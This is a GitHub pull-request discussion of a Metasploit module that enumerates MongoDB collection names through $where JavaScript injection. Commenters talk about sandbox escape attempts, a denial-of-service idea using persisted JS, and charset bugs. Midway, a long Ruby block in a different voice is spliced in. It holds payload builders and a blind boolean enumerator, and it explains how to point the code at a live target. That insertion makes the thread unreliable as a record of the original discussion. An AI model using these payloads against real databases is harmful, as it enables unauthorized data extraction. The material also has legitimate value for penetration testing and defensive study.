Generic MongoDB javascript injection collection enumeration #3430
This module was tested against a small php application I wrote interfacing with MongoDB 2.2.7 https://gist.github.com/brandonprry/c2de8ac2be825007c4de
FWIW, this worked against both the un-named application and my small PHP script. I am not 100% sure I am not making poor assumptions about application behavior. This type of module could probably be updated to accommodate another application found that may behave slightly differently.
This adds a bit more error handling, and better decision making in regards to false responses.
No need to make extra requests. Off by one.
Bah, I have broken something.
Fix some logic bugs that caused incorrect results.
Unborked
Testing, thank you.
Let me know if you run into issues. I ended up needing to use php -S and not apache to host the vuln app. Had a difficult time getting apache to play nice with loading the mongodb driver for some reason. Used CentOS since installing older release versions of software tends to be a bit easier on it.
Having any issues?
@brandonprry this is javascript injection into v8 right? I think there could be some sneakier things to do here. Did you try to poke around at what is accessible to js? For example, injected js has some global scope:
Modifications to objects in this scope seem to get persisted across requests, so there is maybe some way to either
I did, I was not able to get a shell with it, and I am not sure why having
The JS interpreter in the 'mongo' shell has powers that the $where
On Tue, Jun 10, 2014 at 2:11 AM, jvennix-r7 notifications@github.com
http://volatile-minds.blogspot.com -- blog
Aw okay. Looking at the source most things appear pretty sandboxed. I couldn't figure out where the
Persisted js could be used to DoS, e.g. replace Function.prototype.call with
Yes, the db object was removed in 2.4. The original app I tested was 2.2.7 and that was what I installed in my demo box with the vuln PHP script linked in the first post. |
Ah, reading the module description helps too :) Okay, that makes sense now. |
In newer mongo it looks like
So there may still be ways to get this to work past 2.4. Assuming db shares its object graph with the execution context, maybe something like this:
Will give this a shot after I have the php bits set up. |
That would be so awesome. :)
Played around in the mongo shell for a bit just now. Looks like the
Now to go report the mongod crashes I ran into while testing this :(
Thanks for testing. :)
Doing a bit of research on DBRef, maybe we can instantiate it ourselves? http://mongodb.github.io/node-mongodb-native/api-bson-generated/db_ref.html However, we may not have access to the ctor either, read the big green box at the bottom of this page: http://docs.mongodb.org/manual/reference/operator/query/where/ EDIT: Actually, I see DBRef in that box. So that might work?
@brandonprry hrm... well it looks like I can instantiate it fine, but the
So I am thinking,
Frustrating.
Boo, oh well.
Okay, grabbing a version < 2.4 to test this module out. Thanks for putting up with my incessant and verbose spelunkage into mongo's V8 integration :)
Hahaha no worries at all dude, let's make the module the best it can be!
Sent from a computer
Verification tests performed:
Oh man, so close. There was one bug, otherwise it scraped all the collections just fine. Here are the collections in my db:
And here is the result of running the module:
So somewhere along the way the "D" in the "testData" db was dropped. Additionally, it does not seem to find the "." in the collection names. I think you need to add upcase chars and the "." char to your charset
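The charset problem reported above (upper-case letters and "." missing, so "testData" loses its "D") is a property of any blind, boolean-based enumerator, not of this module alone. The following is an added Ruby example, not the Metasploit module's own code and not the vulnerable PHP app: it implements the pre-2.4 technique the thread describes (db.getCollectionNames() reachable from an injected $where clause) against an in-memory oracle built from constructed collection names, so it runs offline. The exact payload shapes, the FAKE_COLLECTIONS list and the two charsets are assumptions made for the example; a live run would replace fake_oracle with an HTTP request and a true/false check of the response.

```ruby
# Added example (not the Metasploit module's own code): blind boolean
# enumeration of collection names through a $where JavaScript injection.
# The HTTP round trip is replaced by an in-memory oracle over CONSTRUCTED
# data so the script runs offline; the payload shapes are assumptions about
# an injectable $where clause, not copied from the module or the PHP app.

# Constructed stand-in for the target database. Pre-2.4 semantics are
# assumed: `db` is reachable from $where, so db.getCollectionNames() works.
FAKE_COLLECTIONS = %w[system.indexes testData users].freeze

# The charset the thread found to be insufficient (no upper case, no "."),
# and one that also covers the characters MongoDB allows in collection names.
LOWER_ONLY   = (('a'..'z').to_a + ('0'..'9').to_a + %w[_]).freeze
FULL_CHARSET = (LOWER_ONLY + ('A'..'Z').to_a + %w[. $]).freeze

# Payload builders: each returns the JavaScript fragment spliced into $where
# so that the query matches only when the guess is correct.
def payload_count(n)
  "db.getCollectionNames().length == #{n}"
end

def payload_length(idx, len)
  "db.getCollectionNames()[#{idx}].length == #{len}"
end

def payload_char(idx, pos, ch)
  # charCodeAt avoids quoting the guessed character inside the injected JS.
  "db.getCollectionNames()[#{idx}].charCodeAt(#{pos}) == #{ch.ord}"
end

# Simulated boolean oracle. It understands only the three payload shapes
# above and answers as the vulnerable application's true/false response
# would. A live run replaces this with an HTTP request plus a check of the
# response body or status.
def fake_oracle(js)
  names = FAKE_COLLECTIONS
  case js
  when /\Adb\.getCollectionNames\(\)\.length == (\d+)\z/
    names.length == $1.to_i
  when /\Adb\.getCollectionNames\(\)\[(\d+)\]\.length == (\d+)\z/
    names[$1.to_i].length == $2.to_i
  when /\Adb\.getCollectionNames\(\)\[(\d+)\]\.charCodeAt\((\d+)\) == (\d+)\z/
    names[$1.to_i][$2.to_i].ord == $3.to_i
  else
    raise ArgumentError, "unexpected payload: #{js}"
  end
end

# Generic blind enumerator: `oracle` is any callable that takes a JS fragment
# and returns true/false. Collection count and each name's length are found
# first, then every character is guessed against the charset.
def enumerate_collections(oracle, charset, max_collections: 64, max_name_len: 120)
  count = (0..max_collections).find { |n| oracle.call(payload_count(n)) }
  raise "could not determine collection count" if count.nil?

  count.times.map do |idx|
    len = (1..max_name_len).find { |l| oracle.call(payload_length(idx, l)) }
    raise "could not determine length of collection #{idx}" if len.nil?

    name = +''
    len.times do |pos|
      hit = charset.find { |ch| oracle.call(payload_char(idx, pos, ch)) }
      # A character missing from the charset is silently dropped: this is
      # exactly how "testData" came back without its "D" in the thread.
      name << hit if hit
    end
    name
  end
end

if __FILE__ == $PROGRAM_NAME
  oracle = method(:fake_oracle)
  puts "lower-case charset: #{enumerate_collections(oracle, LOWER_ONLY).inspect}"
  puts "full charset:       #{enumerate_collections(oracle, FULL_CHARSET).inspect}"
end
```

Because the name length is recovered first, a dropped character is detectable: the assembled string being shorter than the length the oracle confirmed is the signal that the charset is incomplete, which is the check a module should make before reporting results.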
Damn, nice catch. I can update this tonight after work.
Also if you could serialize the collection names into json and
Yeah, that's cool too. Wasn't sure if that would be useful.
Cool, I'll take a look again tomorrow. I played with injecting some
I did discover that memory addresses are leaked to javascript as "threadId" attributes of the system status, which could make the
Also, if the mongo instance is sharded or replicated (requires command line args when starting
Yeah, that was something I fought with in my head, what makes sense in the context of Metasploit? I felt like collection enumeration did enough to prove exploitability without needing to make a full-blown sqlmap clone as a module.
Agreed, this module has a good balance of being lightweight while still remaining valuable to a pentester who encounters a mongo injection.
vprint_status("Getting collection names")
(0..length-1).each do |i|
You can use an exclusive (...) range here instead of limit-1, although length.times do |i| is a bit easier to read.
Updated, I went ahead and used the exclusive operator for the loop.
And, for thoroughness' sake, here is a run on one of the other syntaxes.
Works well, merging
Awesome, dude! Thanks so much!
@jvennix-r7 thanks for landing this, but please check msftidy.rb when you do; there's a quickie howto here: Travis-CI will be doing this automatically soon so we don't have to rely on individual committers to check this every time.
Oh no! It was passing msftidy, but I admit I didn't run it on the last
This module was tested against a small php application I wrote interfacing with MongoDB 2.2.7. It should be generic enough to work against a few injection vectors. It is based on a vuln I found in an un-named application. The code was inspired by official php documentation example three.
https://gist.github.com/brandonprry/c2de8ac2be825007c4de
http://www.php.net//manual/en/mongocollection.find.php
The technique used to enumerate the collections is only available in versions of MongoDB prior to 2.4. I tested against MongoDB 2.2.7.